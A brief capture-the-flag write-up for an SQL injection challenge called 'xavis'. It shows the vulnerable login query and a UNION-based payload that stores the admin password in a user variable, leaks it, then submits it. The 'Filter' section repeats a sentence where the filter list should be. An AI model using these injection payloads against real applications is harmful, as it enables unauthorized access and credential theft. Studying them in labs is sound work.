Skip to main content

xavis

1

We are provided with the SQL query:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='{$_GET[pw]}'

For this challenge, the password is in Korean. There are two ways of solving this challenge.

Filter

The code filters the following:

For this challenge, the password is in Korean. There are two ways of solving this challenge.

  1. Assigning the password to a variable and leaking the variable
  2. Blind SQL Injection

Assigning the password to a variable and leaking the variable

If we provide the following URI parameter:

?pw=' or (SELECT @adminpassword:=pw WHERE id='admin') UNION SELECT @adminpassword -- -

The resultant query becomes:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='' or (SELECT @adminpassword:=pw WHERE id='admin') UNION SELECT @adminpassword -- -'

2

As we can see, the password which was stored in the adminpassword variable has been leaked.

우왕굳

We can now provide the following URI:

?pw=우왕굳

The resultant query becomes:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='우왕굳'

3